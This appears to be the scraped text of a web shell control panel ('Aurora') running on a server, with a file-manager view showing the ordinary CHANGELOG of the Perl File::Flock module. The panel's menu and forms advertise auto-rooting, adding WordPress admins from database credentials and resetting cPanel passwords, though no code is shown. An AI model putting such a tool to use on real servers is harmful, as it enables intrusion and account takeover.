Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
usr
share
doc
perl-File-Flock-2008.01
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: CHANGELOG
+ 2008/03/27 version 2008.01 Joshua Kronengold, mneme at io dot com, sent in a patch to use IO::File instead of the $gensym hack. Applied. Carl Fürstenber, azatoth at gmail dot com and others requested that license terms be spelled out. Done. + 2004/11/19 Bugfix in &unlock for if the lock file has been removed. Bugfix by Vadim O. Ustiansky <ustiansk@sai.msu.ru>. + 2001/06/05 Added $av0debug variable to note locking attempts in $0 + 2001/05/18 Added lock_rename to the EXPORT list. + 2000/09/25 Added tests to make sure 'nonblocking' works + 1999/12/17 Added the lock_rename() function. + 1999/06/22 SunOS systems seem to fail with EWOULDBLOCK on locked files. + 1999/06/21 It appears that on some systems (HP-UX) a blocking call to flock() can fail with EACCES instead of EAGAIN. + 1999/06/15 Perl changes. File::Flock must change to keep up. A call to lock() had to be changed to &lock(). Why? + 1998/12/01 More fixes for Solaris. Modified the unlock() function so that it can be called as a reference. + 1998/11/30 Fixed the object-style interface. Attempt to fix a double-unlock bug that makes the Linux port unhappy + 1998/11/26 Chaged O_RDONLY to O_RDWR for all file opens because Solaris won't let you get an exclusive lock on a read-only file. Crazy! Change suggested by Lupe Christoph <lupe@alanya.m.isar.de>. Thanks! Rewrote the handling of the removal of files created just so that they could be locked. Also tried to make sure that now file descriptors could get leaked.